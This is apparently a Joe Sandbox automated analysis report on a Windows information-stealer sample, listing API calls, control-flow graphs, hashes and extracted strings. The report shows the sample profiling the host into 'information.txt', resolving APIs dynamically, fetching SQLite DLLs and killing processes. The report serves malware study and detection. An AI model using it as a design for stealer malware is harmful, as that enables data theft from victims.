                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 00930C95: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,009565B6,?,?,?), ref: 00930CAD
                                                                                                                                                                                                                • Part of subcall function 00930C95: HeapAlloc.KERNEL32(00000000), ref: 00930CB4
                                                                                                                                                                                                                • Part of subcall function 00930C95: GetLocalTime.KERNEL32(?), ref: 00930CC0
                                                                                                                                                                                                                • Part of subcall function 00930C95: wsprintfA.USER32 ref: 00930CEB
                                                                                                                                                                                                                • Part of subcall function 009315A9: _memset.LIBCMT ref: 009315DC
                                                                                                                                                                                                                • Part of subcall function 009315A9: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 009315FB
                                                                                                                                                                                                                • Part of subcall function 009315A9: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 00931620
                                                                                                                                                                                                                • Part of subcall function 009315A9: RegCloseKey.ADVAPI32(?,?,?,?), ref: 0093162C
                                                                                                                                                                                                                • Part of subcall function 009315A9: CharToOemA.USER32(?,?), ref: 00931640
                                                                                                                                                                                                                • Part of subcall function 00931659: GetCurrentHwProfileA.ADVAPI32(?), ref: 00931674
                                                                                                                                                                                                                • Part of subcall function 00931659: _memset.LIBCMT ref: 009316A3
                                                                                                                                                                                                                • Part of subcall function 00931659: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 009316CB
                                                                                                                                                                                                                • Part of subcall function 00931659: lstrcatA.KERNEL32(?,00956ED4,?,?,?,?,?), ref: 009316E8
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930977: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 009309AA
                                                                                                                                                                                                                • Part of subcall function 00930977: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009309EA
                                                                                                                                                                                                                • Part of subcall function 00930977: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00930A3F
                                                                                                                                                                                                                • Part of subcall function 00930977: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00930A46
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(Path: ,00956884,HWID: ,00956878,GUID: ,0095686C,00000000,MachineID: ,0095685C,00000000,Date: ,00956850,0095684C,11.1,Version: ,009565B6), ref: 00933E1B
                                                                                                                                                                                                                • Part of subcall function 0093221F: OpenProcess.KERNEL32(00000410,00000000,00933E2A,00000000,?), ref: 00932241
                                                                                                                                                                                                                • Part of subcall function 0093221F: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0093225C
                                                                                                                                                                                                                • Part of subcall function 0093221F: CloseHandle.KERNEL32(00000000), ref: 00932263
                                                                                                                                                                                                                • Part of subcall function 00930B05: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930B19
                                                                                                                                                                                                                • Part of subcall function 00930B05: HeapAlloc.KERNEL32(00000000,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930B20
                                                                                                                                                                                                                • Part of subcall function 009317DC: __EH_prolog3_catch_GS.LIBCMT ref: 009317E3
                                                                                                                                                                                                                • Part of subcall function 009317DC: CoInitializeEx.OLE32(00000000,00000000,0000004C,00933F39,Install Date: ,009568B8,00000000,Windows: ,009568A8,Work Dir: In memory,00956890), ref: 009317F4
                                                                                                                                                                                                                • Part of subcall function 009317DC: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00931805
                                                                                                                                                                                                                • Part of subcall function 009317DC: CoCreateInstance.OLE32(00952F00,00000000,00000001,00952E30,?), ref: 0093181F
                                                                                                                                                                                                                • Part of subcall function 009317DC: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00931855
                                                                                                                                                                                                                • Part of subcall function 009317DC: VariantInit.OLEAUT32(?), ref: 009318B0
                                                                                                                                                                                                                • Part of subcall function 0093196C: __EH_prolog3_catch.LIBCMT ref: 00931973
                                                                                                                                                                                                                • Part of subcall function 0093196C: CoInitializeEx.OLE32(00000000,00000000,00000030,00933FA7,?,AV: ,009568CC,Install Date: ,009568B8,00000000,Windows: ,009568A8,Work Dir: In memory,00956890), ref: 00931982
                                                                                                                                                                                                                • Part of subcall function 0093196C: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00931993
                                                                                                                                                                                                                • Part of subcall function 0093196C: CoCreateInstance.OLE32(00952F00,00000000,00000001,00952E30,?), ref: 009319AD
                                                                                                                                                                                                                • Part of subcall function 0093196C: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 009319E3
                                                                                                                                                                                                                • Part of subcall function 0093196C: VariantInit.OLEAUT32(?), ref: 00931A32
                                                                                                                                                                                                                • Part of subcall function 00930C5A: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00921385), ref: 00930C66
                                                                                                                                                                                                                • Part of subcall function 00930C5A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00921385), ref: 00930C6D
                                                                                                                                                                                                                • Part of subcall function 00930C5A: GetComputerNameA.KERNEL32(00000000,00921385), ref: 00930C81
                                                                                                                                                                                                                • Part of subcall function 00930C28: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009213B9), ref: 00930C34
                                                                                                                                                                                                                • Part of subcall function 00930C28: HeapAlloc.KERNEL32(00000000,?,?,?,009213B9), ref: 00930C3B
                                                                                                                                                                                                                • Part of subcall function 00930C28: GetUserNameA.ADVAPI32(00000000,009213B9), ref: 00930C4F
                                                                                                                                                                                                                • Part of subcall function 00931538: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0093154A
                                                                                                                                                                                                                • Part of subcall function 00931538: GetDeviceCaps.GDI32(00000000,00000008), ref: 00931555
                                                                                                                                                                                                                • Part of subcall function 00931538: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00931560
                                                                                                                                                                                                                • Part of subcall function 00931538: ReleaseDC.USER32(00000000,00000000), ref: 0093156B
                                                                                                                                                                                                                • Part of subcall function 00931538: GetProcessHeap.KERNEL32(00000000,00000104,?,?,009340D8,?,Display Resolution: ,009568FC,00000000,User Name: ,009568EC,00000000,Computer Name: ,009568D8,AV: ,009568CC), ref: 00931577
                                                                                                                                                                                                                • Part of subcall function 00931538: HeapAlloc.KERNEL32(00000000,?,?,009340D8,?,Display Resolution: ,009568FC,00000000,User Name: ,009568EC,00000000,Computer Name: ,009568D8,AV: ,009568CC,Install Date: ), ref: 0093157E
                                                                                                                                                                                                                • Part of subcall function 00931538: wsprintfA.USER32 ref: 00931590
                                                                                                                                                                                                                • Part of subcall function 00930DB0: GetKeyboardLayoutList.USER32(00000000,00000000,0095670A,?,?), ref: 00930DE1
                                                                                                                                                                                                                • Part of subcall function 00930DB0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00930DEF
                                                                                                                                                                                                                • Part of subcall function 00930DB0: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00930DFD
                                                                                                                                                                                                                • Part of subcall function 00930DB0: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00930E2C
                                                                                                                                                                                                                • Part of subcall function 00930DB0: LocalFree.KERNEL32(00000000), ref: 00930ED4
                                                                                                                                                                                                                • Part of subcall function 00930D03: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00930D1E
                                                                                                                                                                                                                • Part of subcall function 00930D03: HeapAlloc.KERNEL32(00000000), ref: 00930D25
                                                                                                                                                                                                                • Part of subcall function 00930D03: GetTimeZoneInformation.KERNEL32(?), ref: 00930D34
                                                                                                                                                                                                                • Part of subcall function 00930D03: wsprintfA.USER32 ref: 00930D52
                                                                                                                                                                                                                • Part of subcall function 00930F26: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00934292,Processor: ,[Hardware],00956958,00000000,TimeZone: ,00956948,00000000,Local Time: ,00956934), ref: 00930F3A
                                                                                                                                                                                                                • Part of subcall function 00930F26: HeapAlloc.KERNEL32(00000000,?,?,?,00934292,Processor: ,[Hardware],00956958,00000000,TimeZone: ,00956948,00000000,Local Time: ,00956934,Keyboard Languages: ,00956918), ref: 00930F41
                                                                                                                                                                                                                • Part of subcall function 00930F26: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00956890,?,?,?,00934292,Processor: ,[Hardware],00956958,00000000,TimeZone: ,00956948,00000000,Local Time: ), ref: 00930F5F
                                                                                                                                                                                                                • Part of subcall function 00930F26: RegQueryValueExA.KERNEL32(00956890,00000000,00000000,00000000,000000FF,?,?,?,00934292,Processor: ,[Hardware],00956958,00000000,TimeZone: ,00956948,00000000), ref: 00930F7B
                                                                                                                                                                                                                • Part of subcall function 00930F26: RegCloseKey.ADVAPI32(00956890,?,?,?,00934292,Processor: ,[Hardware],00956958,00000000,TimeZone: ,00956948,00000000,Local Time: ,00956934,Keyboard Languages: ,00956918), ref: 00930F84
                                                                                                                                                                                                                • Part of subcall function 00930FDC: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 00931052
                                                                                                                                                                                                                • Part of subcall function 00930FDC: wsprintfA.USER32 ref: 009310B0
                                                                                                                                                                                                                • Part of subcall function 00930F8F: GetSystemInfo.KERNEL32(?), ref: 00930FA9
                                                                                                                                                                                                                • Part of subcall function 00930F8F: wsprintfA.USER32 ref: 00930FC1
                                                                                                                                                                                                                • Part of subcall function 009310EE: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00956918,Display Resolution: ,009568FC,00000000,User Name: ,009568EC,00000000,Computer Name: ,009568D8,AV: ,009568CC,Install Date: ), ref: 00931106
                                                                                                                                                                                                                • Part of subcall function 009310EE: HeapAlloc.KERNEL32(00000000), ref: 0093110D
                                                                                                                                                                                                                • Part of subcall function 009310EE: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00931129
                                                                                                                                                                                                                • Part of subcall function 009310EE: wsprintfA.USER32 ref: 0093114F
                                                                                                                                                                                                                • Part of subcall function 00931167: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 009311BE
                                                                                                                                                                                                                • Part of subcall function 0093147A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0095670F,?,?), ref: 009314A9
                                                                                                                                                                                                                • Part of subcall function 0093147A: Process32First.KERNEL32(00000000,00000128), ref: 009314B9
                                                                                                                                                                                                                • Part of subcall function 0093147A: Process32Next.KERNEL32(00000000,00000128), ref: 00931517
                                                                                                                                                                                                                • Part of subcall function 0093147A: CloseHandle.KERNEL32(00000000), ref: 00931522
                                                                                                                                                                                                                • Part of subcall function 009311D8: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0095670E,00000000,?,?), ref: 00931248
                                                                                                                                                                                                                • Part of subcall function 009311D8: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00931285
                                                                                                                                                                                                                • Part of subcall function 009311D8: wsprintfA.USER32 ref: 009312B2
                                                                                                                                                                                                                • Part of subcall function 009311D8: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 009312D1
                                                                                                                                                                                                                • Part of subcall function 009311D8: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00931307
                                                                                                                                                                                                                • Part of subcall function 009311D8: lstrlenA.KERNEL32(?), ref: 0093131C
                                                                                                                                                                                                                • Part of subcall function 009311D8: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00956E94), ref: 009313B1
                                                                                                                                                                                                                • Part of subcall function 009311D8: RegCloseKey.ADVAPI32(?), ref: 0093141B
                                                                                                                                                                                                                • Part of subcall function 009311D8: RegCloseKey.ADVAPI32(?), ref: 00931447
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00956918,Display Resolution: ,009568FC,00000000,User Name: ,009568EC,00000000), ref: 009345A3
                                                                                                                                                                                                                • Part of subcall function 00937023: CreateThread.KERNEL32(00000000,00000000,00936F52,?,00000000,00000000), ref: 009370C2
                                                                                                                                                                                                                • Part of subcall function 00937023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009370CA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocateCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                                                              • String ID: 11.1$AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                              • API String ID: 3634126619-3666103263
                                                                                                                                                                                                              • Opcode ID: 92c4f559da60205cb5263ddc0260660f9beca2021d3b20da0878e0dd25035a92
                                                                                                                                                                                                              • Instruction ID: a40389817a53189dc15db50d46c82dd0866f734e6a32226272d50786fa18b7f4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92c4f559da60205cb5263ddc0260660f9beca2021d3b20da0878e0dd25035a92
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98525D36D5002EABCF01FBA1ED52ADDB774AF84704F518261B65177166DB30BE8A8F80

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 1419 9387cf-9387df call 938726 1422 9389d0-938a2d LoadLibraryA * 5 1419->1422 1423 9387e5-9389cb call 927d47 GetProcAddress * 20 1419->1423 1424 938a41-938a48 1422->1424 1425 938a2f-938a3c GetProcAddress 1422->1425 1423->1422 1427 938a73-938a7a 1424->1427 1428 938a4a-938a6e GetProcAddress * 2 1424->1428 1425->1424 1430 938a8e-938a95 1427->1430 1431 938a7c-938a89 GetProcAddress 1427->1431 1428->1427 1433 938a97-938aa4 GetProcAddress 1430->1433 1434 938aa9-938ab0 1430->1434 1431->1430 1433->1434 1435 938ab2-938ad6 GetProcAddress * 2 1434->1435 1436 938adb 1434->1436 1435->1436
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938810
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938827
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0093883E
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938855
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0093886C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938883
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0093889A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 009388B1
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 009388C8
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 009388DF
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 009388F6
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0093890D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938924
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0093893B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938952
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938969
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938980
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938997
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 009389AE
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 009389C5
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,0093864E), ref: 009389D6
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,0093864E), ref: 009389E7
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,0093864E), ref: 009389F8
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,0093864E), ref: 00938A09
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,0093864E), ref: 00938A1A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75B30000,0093864E), ref: 00938A36
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(751E0000,0093864E), ref: 00938A51
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938A68
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(76910000,0093864E), ref: 00938A83
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75670000,0093864E), ref: 00938A9E
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77310000,0093864E), ref: 00938AB9
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938AD0
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2238633743-0
                                                                                                                                                                                                              • Opcode ID: 5dccce7f95976b9383e2380b80e833f527105d4f21679f6da53cb65eb603e27a
                                                                                                                                                                                                              • Instruction ID: b2e0c1ffc9781e5785237c992f30286cb0fd71a6a72cdef5ee9a64f3d081bef3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dccce7f95976b9383e2380b80e833f527105d4f21679f6da53cb65eb603e27a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C071FCB5801212AFDB025FA0FC499253ABAFF0C34131295A5E92D9B2B1DF71C8D0EF59

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 1437 9369f8-936a91 call 93051e * 3 call 9304bc * 6 1455 936a96-936aea call 9229f8 call 922a09 call 921cfd call 936908 call 930562 call 922920 StrCmpCA 1437->1455 1468 936b33-936b43 StrCmpCA 1455->1468 1469 936aec-936b2e call 922a1a call 9304ee call 921cfd call 936880 call 930562 call 922920 1455->1469 1470 936e60-936e8a call 930562 call 9304bc call 930562 call 922920 1468->1470 1471 936b49-936ba3 call 922a2b call 922a3c call 921cfd call 936908 call 930562 call 922920 StrCmpCA 1468->1471 1469->1468 1498 936e8f-936ef9 call 9304bc call 930562 call 922920 call 936f2e call 922920 * 6 call 936f17 call 921cde 1470->1498 1508 936ba5-936bce call 922a4d call 9304ee call 921cfd call 936880 1471->1508 1509 936bec-936bfc StrCmpCA 1471->1509 1540 936bd3-936be7 call 930562 call 922920 1508->1540 1511 936c02-936c5c call 922a5e call 922a6f call 921cfd call 936908 call 930562 call 922920 StrCmpCA 1509->1511 1512 936e2f-936e5e call 930562 call 9304bc call 930562 call 922920 1509->1512 1557 936ca5-936cb5 StrCmpCA 1511->1557 1558 936c5e-936ca0 call 922a80 call 9304ee call 921cfd call 936880 call 930562 call 922920 1511->1558 1512->1498 1540->1509 1560 936cbb-936ccb StrCmpCA 1557->1560 1561 936dfe-936e2d call 930562 call 9304bc call 930562 call 922920 1557->1561 1558->1557 1565 936cd1-936d2b call 922ac4 call 922ad5 call 921cfd call 936908 call 930562 call 922920 StrCmpCA 1560->1565 1566 936dca-936df9 call 930562 call 9304bc call 930562 call 922920 1560->1566 1561->1498 1608 936d74-936d84 StrCmpCA 1565->1608 1609 936d2d-936d6f call 922ae6 call 9304ee call 921cfd call 936880 call 930562 call 922920 1565->1609 1566->1498 1610 936d96-936dc5 call 930562 call 9304bc call 930562 call 922920 1608->1610 1611 936d86-936d91 Sleep 1608->1611 1609->1608 1610->1498 1611->1455
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0093051E: lstrlenA.KERNEL32(?,?,00937300,009566BE,009566BB,?,?,?,?,0093871B), ref: 00930524
                                                                                                                                                                                                                • Part of subcall function 0093051E: lstrcpyA.KERNEL32(00000000,00000000,?,00937300,009566BE,009566BB,?,?,?,?,0093871B), ref: 00930556
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00936908: StrCmpCA.SHLWAPI(?,ERROR), ref: 0093695C
                                                                                                                                                                                                                • Part of subcall function 00936908: lstrlenA.KERNEL32(?), ref: 00936967
                                                                                                                                                                                                                • Part of subcall function 00936908: StrStrA.SHLWAPI(00000000,?), ref: 0093697C
                                                                                                                                                                                                                • Part of subcall function 00936908: lstrlenA.KERNEL32(?), ref: 0093698B
                                                                                                                                                                                                                • Part of subcall function 00936908: lstrlenA.KERNEL32(00000000), ref: 009369A4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00936AE2
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00936B3B
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00936B9B
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00936BF4
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00936C54
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00936CAD
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00936CC3
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00936880: StrCmpCA.SHLWAPI(?,ERROR), ref: 009368B5
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00936D23
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00936D7C
                                                                                                                                                                                                              • Sleep.KERNEL32(0000EA60), ref: 00936D8B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpylstrlen$Sleep
                                                                                                                                                                                                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sql.dll$sqlp.dll$sqlp.dll$sqlp.dll

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0093076A: StrCmpCA.SHLWAPI(?,?,?,0092886E,?,?,?), ref: 00930773
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0092894C
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00932285: _memset.LIBCMT ref: 009322AC
                                                                                                                                                                                                                • Part of subcall function 00932285: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 00932352
                                                                                                                                                                                                                • Part of subcall function 00932285: TerminateProcess.KERNEL32(00000000,00000000), ref: 00932360
                                                                                                                                                                                                                • Part of subcall function 00932285: CloseHandle.KERNEL32(00000000), ref: 00932367
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00928AB1
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00928AB8
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR_V128), ref: 00928BA2
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,009571E0), ref: 00928BBB
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,009571E4), ref: 00928BE3
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00928D03
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00928D1E
                                                                                                                                                                                                                • Part of subcall function 00937023: CreateThread.KERNEL32(00000000,00000000,00936F52,?,00000000,00000000), ref: 009370C2
                                                                                                                                                                                                                • Part of subcall function 00937023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009370CA
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00928D61
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                                                                                                                              • String ID: ERROR_V128

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
